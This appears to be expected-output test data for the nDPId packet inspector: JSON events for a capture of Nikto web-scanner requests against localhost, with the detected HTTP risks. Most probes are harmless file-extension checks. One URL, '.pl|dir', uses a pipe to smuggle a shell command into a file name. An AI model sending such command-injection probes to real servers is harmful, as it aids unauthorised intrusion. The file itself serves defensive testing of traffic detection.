00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackRCE.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1576420276577}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
